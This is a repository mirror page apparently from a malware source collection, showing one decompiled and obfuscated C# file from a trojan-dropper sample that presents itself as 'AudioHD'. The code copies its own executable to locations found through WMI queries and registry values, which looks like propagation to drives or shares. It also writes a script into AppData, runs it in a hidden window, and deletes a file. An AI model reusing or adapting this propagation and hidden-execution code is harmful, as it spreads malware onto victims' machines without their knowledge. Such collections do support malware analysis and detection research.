ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-26 21:35:27 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
206bedd3f3
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0007.cs

113 lines
3.5 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u000E;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Threading;
namespace \u000E
{
internal sealed class \u0007
{
[NonSerialized]
internal static \u0002 \u0001;
private static \u0008 \u0001;
private string \u0001 = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
public static void \u000F() => new \u0007().\u0010();
public void \u0010()
{
try
{
foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0007.\u0001(6807)).Get())
{
Thread.Sleep(50);
string str = Convert.ToString(managementObject[\u0007.\u0001(6844)]);
if (!str.Contains(\u0007.\u0001(1724)))
File.Copy(this.\u0001, \u0007.\u0001(6853) + Environment.MachineName + \u0007.\u0001(1979) + str + \u0007.\u0001(6858), true);
}
}
catch (Exception ex)
{
\u0007.\u0001.\u0010(ex.ToString());
}
try
{
string name = \u0007.\u0001(6887);
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(name);
foreach (string valueName in registryKey.GetValueNames())
{
Thread.Sleep(50);
string str = registryKey.GetValue(valueName).ToString();
if (valueName.ToLower() != \u0007.\u0001(6988))
{
try
{
File.Copy(this.\u0001, str + \u0007.\u0001(7001), true);
}
catch (Exception ex)
{
}
}
}
registryKey.Close();
}
catch (Exception ex)
{
\u0007.\u0001.\u0010(ex.ToString());
}
}
public static void \u0011()
{
if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030)))
return;
StreamWriter streamWriter = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030));
streamWriter.WriteLine(\u0007.\u0001(7043));
streamWriter.WriteLine(\u0007.\u0001(7072));
streamWriter.WriteLine(\u0007.\u0001(7097));
streamWriter.WriteLine(\u0007.\u0001(7138));
streamWriter.WriteLine(\u0007.\u0001(7203));
streamWriter.WriteLine(\u0007.\u0001(7272));
streamWriter.WriteLine(\u0007.\u0001(7345));
streamWriter.WriteLine(\u0007.\u0001(7414));
streamWriter.WriteLine(\u0007.\u0001(7483));
streamWriter.WriteLine(\u0007.\u0001(7556));
streamWriter.WriteLine(\u0007.\u0001(7625));
streamWriter.WriteLine(\u0007.\u0001(7702));
streamWriter.WriteLine(\u0007.\u0001(7779));
streamWriter.WriteLine(\u0007.\u0001(1784));
streamWriter.Close();
new Process()
{
StartInfo = {
WindowStyle = ProcessWindowStyle.Hidden,
FileName = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030))
}
}.Start();
try
{
File.Delete(Path.Combine(Directory.GetCurrentDirectory(), \u0007.\u0001(7856)));
}
catch
{
}
}
static \u0007()
{
\u0003.\u000F();
\u0007.\u0001 = new \u0008();
}
}
}
Reference in New Issue Copy Permalink